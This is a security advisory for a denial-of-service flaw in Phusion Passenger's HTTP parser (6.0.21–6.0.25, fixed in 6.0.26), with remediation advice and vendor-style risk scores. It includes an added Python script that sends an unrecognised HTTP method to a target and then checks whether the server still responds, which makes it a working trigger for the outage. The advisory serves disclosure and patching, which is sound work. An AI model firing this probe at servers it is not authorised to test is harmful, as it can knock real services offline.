Phusion Passenger Denial-of-Service Vulnerability in HTTP Parser

Vulnerability

A denial-of-service vulnerability has been identified in the HTTP parser of Phusion Passenger versions 6.0.21 through 6.0.25. The issue arises when the parser processes a request whose HTTP method is invalid, leading to a service disruption. Version 6.0.26 fixes the issue.

Impact

Exploitation of this vulnerability causes a denial-of-service condition in which the server becomes unresponsive or fails to process requests properly. Because the HTTP parser handles a request before it reaches the application, no authentication or application-specific knowledge is needed to trigger it.

Reproduction

The vulnerability can be reproduced by sending an HTTP request with an unrecognized HTTP method to a server running Phusion Passenger 6.0.21 through 6.0.25. Although the server answers such a request with '400 Bad Request', the parser's handling of the invalid method on the affected versions disrupts normal request processing, producing the denial-of-service condition.

Remediation

Users are advised to upgrade to Phusion Passenger version 6.0.26 or later, which addresses this vulnerability. Instructions for upgrading are available in the Phusion Passenger documentation.
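An added example, not code from the Phusion Passenger project or from this page, serving both the reproduction and remediation sections above: it classifies a method against the RFC 9110 token grammar, sends it verbatim in a raw HTTP/1.1 request (so a client library cannot quietly normalise it), then sends a plain GET to see whether the server still answers, and it checks a reported version string against the affected range stated above. The target URL, the probe method BOGUS and the 0.5 s pause between requests are assumptions chosen for illustration.

```python
"""Probe a Passenger-fronted server with an unrecognized HTTP method and check
that it keeps serving afterwards; also test a version string against the
advisory's affected range. Assumed inputs: target URL, probe method, pause."""
import re
import socket
import ssl
import time
from urllib.parse import urlsplit

# Affected range stated in the advisory: 6.0.21 through 6.0.25, fixed in 6.0.26.
AFFECTED_MIN = (6, 0, 21)
FIXED = (6, 0, 26)

# RFC 9110: method = token = 1*tchar. A valid token that is not a known method
# (e.g. BOGUS) is "unrecognized"; anything outside tchar is "malformed".
_TCHAR = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
_STANDARD = {"GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS", "TRACE", "PATCH"}


def parse_version(text: str) -> tuple:
    """(major, minor, patch) from a string such as 'Phusion Passenger 6.0.25'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(text: str) -> bool:
    """True if the reported version lies in the range the advisory lists."""
    return AFFECTED_MIN <= parse_version(text) < FIXED


def classify_method(method: str) -> str:
    """'standard', 'unrecognized' (valid token, unknown method) or 'malformed'."""
    if not _TCHAR.match(method):
        return "malformed"
    return "standard" if method in _STANDARD else "unrecognized"


def build_request(method: str, url: str) -> bytes:
    """Raw HTTP/1.1 request; the method goes on the wire exactly as given."""
    u = urlsplit(url)
    path = (u.path or "/") + (f"?{u.query}" if u.query else "")
    return (f"{method} {path} HTTP/1.1\r\nHost: {u.netloc}\r\n"
            "Connection: close\r\n\r\n").encode("latin-1")


def parse_status(response: bytes):
    """Status code from the first line of a response, or None if unparseable."""
    m = re.match(rb"HTTP/1\.[01] (\d{3})", response.split(b"\r\n", 1)[0])
    return int(m.group(1)) if m else None


def _exchange(url: str, method: str, timeout: float):
    """Open a socket, send one request, read until close, return the status."""
    u = urlsplit(url)
    port = u.port or (443 if u.scheme == "https" else 80)
    sock = socket.create_connection((u.hostname, port), timeout=timeout)
    if u.scheme == "https":
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=u.hostname)
    with sock:
        sock.sendall(build_request(method, url))
        chunks = []
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return parse_status(b"".join(chunks))


def probe(url: str, method: str = "BOGUS", timeout: float = 5.0, pause: float = 0.5) -> dict:
    """Send the odd method, then a plain GET. A patched server should answer the
    probe with 400 and still serve the GET; a server that no longer answers the
    follow-up is showing the denial-of-service described in the advisory."""
    result = {"method": method, "kind": classify_method(method)}
    for key, m in (("probe", method), ("followup", "GET")):
        try:
            result[f"{key}_status"] = _exchange(url, m, timeout)
        except OSError as exc:  # connection refused, reset or timed out
            result[f"{key}_status"] = None
            result[f"{key}_error"] = str(exc)
        time.sleep(pause)
    result["still_serving"] = result["followup_status"] is not None
    return result


if __name__ == "__main__":
    import sys
    # Usage: python probe.py http://app.example.test/ [METHOD]
    target = sys.argv[1]
    print(probe(target, sys.argv[2] if len(sys.argv) > 2 else "BOGUS"))
```

Run this only against a system you are authorized to test: on an affected version the probe may take the service down, which is the point of the follow-up GET. A `probe_status` of 400 together with `still_serving` True is the expected result on 6.0.26 or later; a missing follow-up status, or a connection error on the probe itself, is what the advisory's denial-of-service looks like from the client side.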

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 6.4
impact: 2.5
exploitability: 9.3
remediation: 7.7
relevance: 0.0
threat: 4.8
urgency: 2.9
incentive: 10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.